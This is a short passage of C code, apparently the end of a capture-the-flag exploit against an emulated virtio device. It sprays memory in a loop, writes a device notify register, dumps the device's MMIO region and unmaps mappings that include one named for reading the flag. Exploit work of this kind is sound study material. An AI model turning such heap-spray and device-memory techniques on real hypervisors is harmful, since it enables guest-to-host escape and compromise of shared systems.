for(int i = 0; i < 0x100; i+=4){
spray();
}
mmio_write16(notify_addr, 0);
puts("--------------------------------");
hexdump((char*)virtio_common_mmio + 0x000, 0x100);
munmap(dma_mem, 0x3000);
munmap(virtio_mmio, 0x4000);
munmap(readflag_mmio, 0x1000);
}